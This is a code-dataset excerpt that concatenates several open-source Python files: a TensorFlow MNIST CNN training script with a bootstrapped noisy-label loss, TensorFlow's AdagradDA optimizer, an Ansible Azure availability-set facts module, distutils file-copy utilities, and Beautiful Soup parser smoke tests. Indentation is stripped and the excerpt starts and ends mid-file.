stddev=0.1,
seed=SEED,
dtype=data_type()))
fc2_biases = tf.Variable(tf.constant(
0.1, shape=[NUM_LABELS], dtype=data_type()))
# We will replicate the model structure for the training subgraph, as well
# as the evaluation subgraphs, while sharing the trainable parameters.
def model(data, train=False):
"""The Model definition."""
# 2D convolution, with 'SAME' padding (i.e. the output feature map has
# the same size as the input). Note that {strides} is a 4D array whose
# shape matches the data layout: [image index, y, x, depth].
conv = tf.nn.conv2d(data,
conv1_weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Bias and rectified linear non-linearity.
relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
# Max pooling. The kernel size spec {ksize} also follows the layout of
# the data. Here we have a pooling window of 2, and a stride of 2.
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
conv = tf.nn.conv2d(pool,
conv2_weights,
strides=[1, 1, 1, 1],
padding='SAME')
relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Reshape the feature map cuboid into a 2D matrix to feed it to the
# fully connected layers.
pool_shape = pool.get_shape().as_list() #pylint: disable=no-member
reshape = tf.reshape(
pool,
[pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
# Fully connected layer. Note that the '+' operation automatically
# broadcasts the biases.
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# Add a 50% dropout during training only. Dropout also scales
# activations such that no rescaling is needed at evaluation time.
if train:
hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
return tf.matmul(hidden, fc2_weights) + fc2_biases
# Training computation: logits + cross-entropy loss.
logits = model(train_data_node, True)
  # Bootstrapped cross-entropy for noisy labels:
  #   t: observed (possibly corrupted) one-hot labels
  #   q: estimated class probabilities (softmax output)
  #   z: one-hot encoding of the model's own prediction (argmax of q)
  # The training target is the convex combination BETA*t + (1-BETA)*z, so the
  # model partially trusts its own predictions instead of the noisy labels.
  t = tf.one_hot(train_labels_node, NUM_LABELS)
  q = tf.nn.softmax(logits)
  prediction_idx = tf.arg_max(q, dimension=1)
  z = tf.one_hot(prediction_idx, NUM_LABELS)
  # Standard cross-entropy on the observed labels (kept for reference):
  # cross_entropy = -tf.reduce_sum(t * tf.log(q), axis=1)
  cross_entropy = -tf.reduce_sum((BETA * t + (1 - BETA) * z) * tf.log(q), axis=1)
  loss = tf.reduce_mean(cross_entropy)
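  # Worked example of the bootstrapped target (hypothetical numbers): with
  # BETA = 0.8, a noisy one-hot label t = [0, 1, 0, ...] and a confident model
  # prediction z = [1, 0, 0, ...], the effective target becomes
  # 0.8 * t + 0.2 * z = [0.2, 0.8, 0, ...], so a possibly wrong label no
  # longer dominates the loss.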
# loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
# logits, train_labels_node))
# L2 regularization for the fully connected parameters.
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
# Add the regularization term to the loss.
loss += 5e-4 * regularizers
# Optimizer: set up a variable that's incremented once per batch and
# controls the learning rate decay.
batch = tf.Variable(0, dtype=data_type())
# Decay once per epoch, using an exponential schedule starting at 0.01.
learning_rate = tf.train.exponential_decay(
0.01, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
train_size, # Decay step.
0.95, # Decay rate.
staircase=True)
# Use simple momentum for the optimization.
optimizer = tf.train.MomentumOptimizer(learning_rate,
0.9).minimize(loss,
global_step=batch)
# Predictions for the current training minibatch.
train_prediction = tf.nn.softmax(logits)
# Predictions for the test and validation, which we'll compute less often.
eval_prediction = tf.nn.softmax(model(eval_data))
# Small utility function to evaluate a dataset by feeding batches of data to
# {eval_data} and pulling the results from {eval_predictions}.
# Saves memory and enables this to run on smaller GPUs.
def eval_in_batches(data, sess):
"""Get all predictions for a dataset by running it in small batches."""
size = data.shape[0]
if size < EVAL_BATCH_SIZE:
raise ValueError("batch size for evals larger than dataset: %d" % size)
predictions = np.ndarray(shape=(size, NUM_LABELS), dtype=np.float32)
for begin in xrange(0, size, EVAL_BATCH_SIZE):
end = begin + EVAL_BATCH_SIZE
if end <= size:
predictions[begin:end, :] = sess.run(
eval_prediction,
feed_dict={eval_data: data[begin:end, ...]})
else:
batch_predictions = sess.run(
eval_prediction,
feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
return predictions
# Create a local session to run the training.
start_time = time.time()
with tf.Session() as sess:
# Run all the initializers to prepare the trainable parameters.
tf.global_variables_initializer().run() #pylint: disable=no-member
print('Initialized!')
# Loop through training steps.
for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
# Compute the offset of the current minibatch in the data.
# Note that we could use better randomization across epochs.
offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
# This dictionary maps the batch data (as a numpy array) to the
# node in the graph it should be fed to.
feed_dict = {train_data_node: batch_data,
train_labels_node: batch_labels}
# Run the graph and fetch some of the nodes.
_, l, lr, predictions = sess.run(
[optimizer, loss, learning_rate, train_prediction],
feed_dict=feed_dict)
if step % EVAL_FREQUENCY == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
print('Step %d (epoch %.2f), %.1f ms' %
(step, float(step) * BATCH_SIZE / train_size,
1000 * elapsed_time / EVAL_FREQUENCY))
print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
print('Validation error: %.1f%%' % error_rate(
eval_in_batches(validation_data, sess), validation_labels))
sys.stdout.flush()
# Finally print the result!
test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
print('Test error: %.1f%%' % test_error)
if FLAGS.self_test:
print('test_error', test_error)
assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
test_error,)
if __name__ == '__main__':
tf.app.run()
| mit | 8,634,300,840,375,226,000 | 43.479769 | 127 | 0.601105 | false |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/tensorflow/python/training/adagrad_da.py | 34 | 5998 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adagrad Dual Averaging for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
class AdagradDAOptimizer(optimizer.Optimizer):
"""Adagrad Dual Averaging algorithm for sparse linear models.
See this [paper](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf).
This optimizer takes care of regularization of unseen features in a mini batch
by updating them when they are seen with a closed form update rule that is
equivalent to having updated them on every mini-batch.
AdagradDA is typically used when there is a need for large sparsity in the
trained model. This optimizer only guarantees sparsity for linear models. Be
careful when using AdagradDA for deep networks as it will require careful
initialization of the gradient accumulators for it to train.
@@__init__
"""
def __init__(self,
learning_rate,
global_step,
initial_gradient_squared_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0,
use_locking=False,
name="AdagradDA"):
"""Construct a new AdagradDA optimizer.
Args:
learning_rate: A `Tensor` or a floating point value. The learning rate.
global_step: A `Tensor` containing the current training step number.
initial_gradient_squared_accumulator_value: A floating point value.
Starting value for the accumulators, must be positive.
l1_regularization_strength: A float value, must be greater than or
equal to zero.
l2_regularization_strength: A float value, must be greater than or
equal to zero.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "AdagradDA".
Raises:
ValueError: If the `initial_gradient_squared_accumulator_value` is
invalid.
"""
if initial_gradient_squared_accumulator_value <= 0.0:
raise ValueError("initial_gradient_squared_accumulator_value must be"
"positive: %s" %
initial_gradient_squared_accumulator_value)
super(AdagradDAOptimizer, self).__init__(use_locking, name)
self._learning_rate = learning_rate
self._initial_gradient_squared_accumulator_value = (
initial_gradient_squared_accumulator_value)
# Created in Initialize.
self._learning_rate_tensor = None
self._l1_regularization_strength = l1_regularization_strength
self._l2_regularization_strength = l2_regularization_strength
self._global_step = global_step
def _create_slots(self, var_list):
for v in var_list:
with ops.colocate_with(v):
g_val = constant_op.constant(
0.0, shape=v.get_shape(), dtype=v.dtype.base_dtype)
gg_val = constant_op.constant(
self._initial_gradient_squared_accumulator_value,
shape=v.get_shape(),
dtype=v.dtype.base_dtype)
self._get_or_make_slot(v, g_val, "gradient_accumulator", self._name)
self._get_or_make_slot(v, gg_val, "gradient_squared_accumulator",
self._name)
def _prepare(self):
self._learning_rate_tensor = ops.convert_to_tensor(
self._learning_rate, name="learning_rate")
def _apply_dense(self, grad, var):
g_acc = self.get_slot(var, "gradient_accumulator")
gg_acc = self.get_slot(var, "gradient_squared_accumulator")
# Performance optimization so that worker creates a copy of the global step
# to avoid overloading the parameter server holding the global step.
with ops.device(grad[0].device):
global_step = array_ops.identity(self._global_step) + 1
return training_ops.apply_adagrad_da(
var,
g_acc,
gg_acc,
grad,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
math_ops.cast(self._l1_regularization_strength, var.dtype.base_dtype),
math_ops.cast(self._l2_regularization_strength, var.dtype.base_dtype),
global_step,
use_locking=self._use_locking)
def _apply_sparse(self, grad, var):
g_acc = self.get_slot(var, "gradient_accumulator")
gg_acc = self.get_slot(var, "gradient_squared_accumulator")
# Performance optimization so that worker creates a copy of the global step
# to avoid overloading the parameter server holding the global step.
with ops.device(grad[0].device):
global_step = array_ops.identity(self._global_step) + 1
return training_ops.sparse_apply_adagrad_da(
var,
g_acc,
gg_acc,
grad.values,
grad.indices,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
math_ops.cast(self._l1_regularization_strength, var.dtype.base_dtype),
math_ops.cast(self._l2_regularization_strength, var.dtype.base_dtype),
global_step,
use_locking=self._use_locking)
| agpl-3.0 | 5,934,173,522,810,177,000 | 42.463768 | 80 | 0.680894 | false |
bregman-arie/ansible | lib/ansible/modules/cloud/azure/azure_rm_availabilityset_facts.py | 15 | 4569 | #!/usr/bin/python
#
# Copyright (c) 2016 Julien Stroheker, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_availabilityset_facts
version_added: "2.4"
short_description: Get availability set facts.
description:
- Get facts for a specific availability set or all availability sets.
options:
name:
description:
- Limit results to a specific availability set
resource_group:
description:
- The resource group to search for the desired availability set
extends_documentation_fragment:
- azure
author:
- "Julien Stroheker (@julienstroheker)"
'''
EXAMPLES = '''
- name: Get facts for one availability set
azure_rm_availabilityset_facts:
name: Testing
resource_group: TestRG
- name: Get facts for all availability sets in a specific resource group
azure_rm_availabilityset_facts:
resource_group: TestRG
'''
RETURN = '''
azure_availabilityset:
description: List of availability sets dicts.
returned: always
type: list
example: [{
"location": "eastus2",
"name": "myavailabilityset",
"properties": {
"platformFaultDomainCount": 3,
"platformUpdateDomainCount": 2,
"virtualMachines": []
},
"sku": "Aligned",
"type": "Microsoft.Compute/availabilitySets"
}]
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
except:
# handled in azure_rm_common
pass
AZURE_OBJECT_CLASS = 'AvailabilitySet'
class AzureRMAvailabilitySetFacts(AzureRMModuleBase):
"""Utility class to get availability set facts"""
def __init__(self):
self.module_args = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list')
)
self.results = dict(
changed=False,
ansible_facts=dict(
azure_availabilitysets=[]
)
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMAvailabilitySetFacts, self).__init__(
derived_arg_spec=self.module_args,
supports_tags=False,
facts_module=True
)
def exec_module(self, **kwargs):
for key in self.module_args:
setattr(self, key, kwargs[key])
if self.name and not self.resource_group:
self.fail("Parameter error: resource group required when filtering by name.")
if self.name:
self.results['ansible_facts']['azure_availabilitysets'] = self.get_item()
else:
self.results['ansible_facts']['azure_availabilitysets'] = self.list_items()
return self.results
def get_item(self):
"""Get a single availability set"""
self.log('Get properties for {}'.format(self.name))
item = None
result = []
try:
item = self.compute_client.availability_sets.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
avase = self.serialize_obj(item, AZURE_OBJECT_CLASS)
avase['name'] = item.name
avase['type'] = item.type
avase['sku'] = item.sku.name
result = [avase]
return result
def list_items(self):
"""Get all availability sets"""
self.log('List all availability sets')
try:
response = self.compute_client.availability_sets.list(self.resource_group)
except CloudError as exc:
self.fail('Failed to list all items - {}'.format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
avase = self.serialize_obj(item, AZURE_OBJECT_CLASS)
avase['name'] = item.name
avase['type'] = item.type
avase['sku'] = item.sku.name
results.append(avase)
return results
def main():
"""Main module execution code path"""
AzureRMAvailabilitySetFacts()
if __name__ == '__main__':
main()
| gpl-3.0 | 5,869,415,297,240,903,000 | 25.410405 | 92 | 0.594003 | false |
jagguli/intellij-community | python/lib/Lib/distutils/file_util.py | 81 | 8341 | """distutils.file_util
Utility functions for operating on single files.
"""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: file_util.py 37828 2004-11-10 22:23:15Z loewis $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'
_copy_action = { None: 'copying',
'hard': 'hard linking',
'sym': 'symbolically linking' }
def _copy_file_contents (src, dst, buffer_size=16*1024):
"""Copy the file 'src' to 'dst'; both must be filenames. Any error
opening either file, reading from 'src', or writing to 'dst', raises
DistutilsFileError. Data is read/written in chunks of 'buffer_size'
bytes (default 16k). No attempt is made to handle anything apart from
regular files.
"""
# Stolen from shutil module in the standard library, but with
# custom error-handling added.
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not open '%s': %s" % (src, errstr)
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not delete '%s': %s" % (dst, errstr)
try:
fdst = open(dst, 'wb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not create '%s': %s" % (dst, errstr)
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not read from '%s': %s" % (src, errstr)
if not buf:
break
try:
fdst.write(buf)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not write to '%s': %s" % (dst, errstr)
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
# _copy_file_contents()
def copy_file (src, dst,
preserve_mode=1,
preserve_times=1,
update=0,
link=None,
verbose=0,
dry_run=0):
"""Copy a file 'src' to 'dst'. If 'dst' is a directory, then 'src' is
copied there with the same name; otherwise, it must be a filename. (If
the file exists, it will be ruthlessly clobbered.) If 'preserve_mode'
is true (the default), the file's mode (type and permission bits, or
whatever is analogous on the current platform) is copied. If
'preserve_times' is true (the default), the last-modified and
last-access times are copied as well. If 'update' is true, 'src' will
only be copied if 'dst' does not exist, or if 'dst' does exist but is
older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
# XXX if the destination file already exists, we clobber it if
# copying, but blow up if linking. Hmmm. And I don't know what
# macostools.copyfile() does. Should definitely be consistent, and
# should probably blow up if destination exists and we would be
# changing it (ie. it's not already a hard/soft link to src OR
# (not update) and (src newer than dst).
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError, \
"can't copy '%s': doesn't exist or not a regular file" % src
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
log.debug("not copying %s (output up-to-date)", src)
return dst, 0
try:
action = _copy_action[link]
except KeyError:
raise ValueError, \
"invalid value '%s' for 'link' argument" % link
if os.path.basename(dst) == os.path.basename(src):
log.info("%s %s -> %s", action, src, dir)
else:
log.info("%s %s -> %s", action, src, dst)
if dry_run:
return (dst, 1)
# On Mac OS, use the native file copy routine
if os.name == 'mac':
import macostools
try:
macostools.copy(src, dst, 0, preserve_times)
except os.error, exc:
raise DistutilsFileError, \
"could not copy '%s' to '%s': %s" % (src, dst, exc[-1])
# If linking (hard or symbolic), use the appropriate system call
# (Unix only, of course, but that's the caller's responsibility)
elif link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
# Otherwise (non-Mac, not linking), copy the file contents and
# (optionally) copy the times and mode.
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
# According to David Ascher <[email protected]>, utime() should be done
# before chmod() (at least under NT).
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode and hasattr(os, 'chmod'):
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (dst, 1)
# copy_file ()
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst,
verbose=0,
dry_run=0):
"""Move a file 'src' to 'dst'. If 'dst' is a directory, the file will
be moved into it with the same name; otherwise, 'src' is just renamed
to 'dst'. Return the new full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
log.info("moving %s -> %s", src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError, \
"can't move '%s': not a regular file" % src
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError, \
"can't move '%s': destination '%s' already exists" % \
(src, dst)
if not isdir(dirname(dst)):
raise DistutilsFileError, \
"can't move '%s': destination '%s' not a valid path" % \
(src, dst)
copy_it = 0
try:
os.rename(src, dst)
except os.error, (num, msg):
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError, \
"couldn't move '%s' to '%s': %s" % (src, dst, msg)
if copy_it:
copy_file(src, dst)
try:
os.unlink(src)
except os.error, (num, msg):
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError, \
("couldn't move '%s' to '%s' by copy/delete: " +
"delete '%s' failed: %s") % \
(src, dst, src, msg)
return dst
# move_file ()
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, "w")
for line in contents:
f.write(line + "\n")
f.close()
| apache-2.0 | -6,619,488,077,227,218,000 | 31.968379 | 76 | 0.56492 | false |
dya2/python-for-android | python3-alpha/extra_modules/bs4/testing.py | 46 | 18683 | """Helper classes for tests."""
import copy
import functools
import unittest
from unittest import TestCase
from bs4 import BeautifulSoup
from bs4.element import (
Comment,
Doctype,
SoupStrainer,
)
from bs4.builder import HTMLParserTreeBuilder
default_builder = HTMLParserTreeBuilder
class SoupTest(unittest.TestCase):
@property
def default_builder(self):
return default_builder()
def soup(self, markup, **kwargs):
"""Build a Beautiful Soup object from markup."""
builder = kwargs.pop('builder', self.default_builder)
return BeautifulSoup(markup, builder=builder, **kwargs)
def document_for(self, markup):
"""Turn an HTML fragment into a document.
The details depend on the builder.
"""
return self.default_builder.test_fragment_to_document(markup)
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
builder = self.default_builder
obj = BeautifulSoup(to_parse, builder=builder)
if compare_parsed_to is None:
compare_parsed_to = to_parse
self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
class HTMLTreeBuilderSmokeTest(object):
"""A basic test of a treebuilder's competence.
Any HTML treebuilder, present or future, should be able to pass
these tests. With invalid markup, there's room for interpretation,
and different parsers can handle it differently. But with the
markup in these tests, there's not much room for interpretation.
"""
def assertDoctypeHandled(self, doctype_fragment):
"""Assert that a given doctype string is handled correctly."""
doctype_str, soup = self._document_with_doctype(doctype_fragment)
# Make sure a Doctype object was created.
doctype = soup.contents[0]
self.assertEqual(doctype.__class__, Doctype)
self.assertEqual(doctype, doctype_fragment)
self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)
# Make sure that the doctype was correctly associated with the
# parse tree and that the rest of the document parsed.
self.assertEqual(soup.p.contents[0], 'foo')
def _document_with_doctype(self, doctype_fragment):
"""Generate and parse a document with the given doctype."""
doctype = '<!DOCTYPE %s>' % doctype_fragment
markup = doctype + '\n<p>foo</p>'
soup = self.soup(markup)
return doctype, soup
def test_normal_doctypes(self):
"""Make sure normal, everyday HTML doctypes are handled correctly."""
self.assertDoctypeHandled("html")
self.assertDoctypeHandled(
'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')
def test_public_doctype_with_url(self):
doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
self.assertDoctypeHandled(doctype)
def test_system_doctype(self):
self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')
def test_namespaced_system_doctype(self):
# We can handle a namespaced doctype with a system ID.
self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')
def test_namespaced_public_doctype(self):
# Test a namespaced doctype with a public id.
self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')
def test_deepcopy(self):
"""Make sure you can copy the tree builder.
This is important because the builder is part of a
BeautifulSoup object, and we want to be able to copy that.
"""
copy.deepcopy(self.default_builder)
def test_p_tag_is_never_empty_element(self):
"""A <p> tag is never designated as an empty-element tag.
Even if the markup shows it as an empty-element tag, it
shouldn't be presented that way.
"""
soup = self.soup("<p/>")
self.assertFalse(soup.p.is_empty_element)
self.assertEqual(str(soup.p), "<p></p>")
def test_unclosed_tags_get_closed(self):
"""A tag that's not closed by the end of the document should be closed.
This applies to all tags except empty-element tags.
"""
self.assertSoupEquals("<p>", "<p></p>")
self.assertSoupEquals("<b>", "<b></b>")
self.assertSoupEquals("<br>", "<br/>")
def test_br_is_always_empty_element_tag(self):
"""A <br> tag is designated as an empty-element tag.
Some parsers treat <br></br> as one <br/> tag, some parsers as
two tags, but it should always be an empty-element tag.
"""
soup = self.soup("<br></br>")
self.assertTrue(soup.br.is_empty_element)
self.assertEqual(str(soup.br), "<br/>")
def test_nested_formatting_elements(self):
self.assertSoupEquals("<em><em></em></em>")
def test_comment(self):
# Comments are represented as Comment objects.
markup = "<p>foo<!--foobar-->baz</p>"
self.assertSoupEquals(markup)
soup = self.soup(markup)
comment = soup.find(text="foobar")
self.assertEqual(comment.__class__, Comment)
def test_preserved_whitespace_in_pre_and_textarea(self):
"""Whitespace must be preserved in <pre> and <textarea> tags."""
self.assertSoupEquals("<pre> </pre>")
self.assertSoupEquals("<textarea> woo </textarea>")
def test_nested_inline_elements(self):
"""Inline elements can be nested indefinitely."""
b_tag = "<b>Inside a B tag</b>"
self.assertSoupEquals(b_tag)
nested_b_tag = "<p>A <i>nested <b>tag</b></i></p>"
self.assertSoupEquals(nested_b_tag)
double_nested_b_tag = "<p>A <a>doubly <i>nested <b>tag</b></i></a></p>"
self.assertSoupEquals(nested_b_tag)
def test_nested_block_level_elements(self):
"""Block elements can be nested."""
soup = self.soup('<blockquote><p><b>Foo</b></p></blockquote>')
blockquote = soup.blockquote
self.assertEqual(blockquote.p.b.string, 'Foo')
self.assertEqual(blockquote.b.string, 'Foo')
def test_correctly_nested_tables(self):
"""One table can go inside another one."""
markup = ('<table id="1">'
'<tr>'
"<td>Here's another table:"
'<table id="2">'
'<tr><td>foo</td></tr>'
'</table></td>')
self.assertSoupEquals(
markup,
'<table id="1"><tr><td>Here\'s another table:'
'<table id="2"><tr><td>foo</td></tr></table>'
'</td></tr></table>')
self.assertSoupEquals(
"<table><thead><tr><td>Foo</td></tr></thead>"
"<tbody><tr><td>Bar</td></tr></tbody>"
"<tfoot><tr><td>Baz</td></tr></tfoot></table>")
def test_angle_brackets_in_attribute_values_are_escaped(self):
        self.assertSoupEquals('<a b="<a>"></a>', '<a b="&lt;a&gt;"></a>')
def test_entities_in_attributes_converted_to_unicode(self):
expect = '<p id="pi\N{LATIN SMALL LETTER N WITH TILDE}ata"></p>'
        self.assertSoupEquals('<p id="pi&#241;ata"></p>', expect)
        self.assertSoupEquals('<p id="pi&#xf1;ata"></p>', expect)
        self.assertSoupEquals('<p id="pi&ntilde;ata"></p>', expect)
def test_entities_in_text_converted_to_unicode(self):
expect = '<p>pi\N{LATIN SMALL LETTER N WITH TILDE}ata</p>'
self.assertSoupEquals("<p>piñata</p>", expect)
self.assertSoupEquals("<p>piñata</p>", expect)
self.assertSoupEquals("<p>piñata</p>", expect)
def test_out_of_range_entity(self):
expect = "\N{REPLACEMENT CHARACTER}"
self.assertSoupEquals("�", expect)
self.assertSoupEquals("�", expect)
self.assertSoupEquals("�", expect)
def test_basic_namespaces(self):
"""Parsers don't need to *understand* namespaces, but at the
very least they should not choke on namespaces or lose
data."""
markup = b'<html xmlns="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML" xmlns:svg="http://www.w3.org/2000/svg"><head></head><body><mathml:msqrt>4</mathml:msqrt><b svg:fill="red"></b></body></html>'
soup = self.soup(markup)
self.assertEqual(markup, soup.encode())
html = soup.html
self.assertEqual('http://www.w3.org/1999/xhtml', soup.html['xmlns'])
self.assertEqual(
'http://www.w3.org/1998/Math/MathML', soup.html['xmlns:mathml'])
self.assertEqual(
'http://www.w3.org/2000/svg', soup.html['xmlns:svg'])
#
# Generally speaking, tests below this point are more tests of
# Beautiful Soup than tests of the tree builders. But parsers are
# weird, so we run these tests separately for every tree builder
# to detect any differences between them.
#
def test_soupstrainer(self):
"""Parsers should be able to work with SoupStrainers."""
strainer = SoupStrainer("b")
soup = self.soup("A <b>bold</b> <meta/> <i>statement</i>",
parse_only=strainer)
self.assertEqual(soup.decode(), "<b>bold</b>")
def test_single_quote_attribute_values_become_double_quotes(self):
self.assertSoupEquals("<foo attr='bar'></foo>",
'<foo attr="bar"></foo>')
def test_attribute_values_with_nested_quotes_are_left_alone(self):
text = """<foo attr='bar "brawls" happen'>a</foo>"""
self.assertSoupEquals(text)
def test_attribute_values_with_double_nested_quotes_get_quoted(self):
text = """<foo attr='bar "brawls" happen'>a</foo>"""
soup = self.soup(text)
soup.foo['attr'] = 'Brawls happen at "Bob\'s Bar"'
self.assertSoupEquals(
soup.foo.decode(),
"""<foo attr="Brawls happen at "Bob\'s Bar"">a</foo>""")
def test_ampersand_in_attribute_value_gets_escaped(self):
self.assertSoupEquals('<this is="really messed up & stuff"></this>',
'<this is="really messed up & stuff"></this>')
self.assertSoupEquals(
'<a href="http://example.org?a=1&b=2;3">foo</a>',
'<a href="http://example.org?a=1&b=2;3">foo</a>')
def test_escaped_ampersand_in_attribute_value_is_left_alone(self):
        self.assertSoupEquals('<a href="http://example.org?a=1&amp;b=2;3"></a>')
def test_entities_in_strings_converted_during_parsing(self):
# Both XML and HTML entities are converted to Unicode characters
# during parsing.
text = "<p><<sacré bleu!>></p>"
expected = "<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>"
self.assertSoupEquals(text, expected)
def test_smart_quotes_converted_on_the_way_in(self):
# Microsoft smart quotes are converted to Unicode characters during
# parsing.
quote = b"<p>\x91Foo\x92</p>"
soup = self.soup(quote)
self.assertEqual(
soup.p.string,
"\N{LEFT SINGLE QUOTATION MARK}Foo\N{RIGHT SINGLE QUOTATION MARK}")
def test_non_breaking_spaces_converted_on_the_way_in(self):
soup = self.soup("<a> </a>")
self.assertEqual(soup.a.string, "\N{NO-BREAK SPACE}" * 2)
def test_entities_converted_on_the_way_out(self):
text = "<p><<sacré bleu!>></p>"
expected = "<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>".encode("utf-8")
soup = self.soup(text)
self.assertEqual(soup.p.encode("utf-8"), expected)
def test_real_iso_latin_document(self):
# Smoke test of interrelated functionality, using an
# easy-to-understand document.
# Here it is in Unicode. Note that it claims to be in ISO-Latin-1.
unicode_html = '<html><head><meta content="text/html; charset=ISO-Latin-1" http-equiv="Content-type"/></head><body><p>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</p></body></html>'
# That's because we're going to encode it into ISO-Latin-1, and use
# that to test.
iso_latin_html = unicode_html.encode("iso-8859-1")
# Parse the ISO-Latin-1 HTML.
soup = self.soup(iso_latin_html)
# Encode it to UTF-8.
result = soup.encode("utf-8")
# What do we expect the result to look like? Well, it would
# look like unicode_html, except that the META tag would say
# UTF-8 instead of ISO-Latin-1.
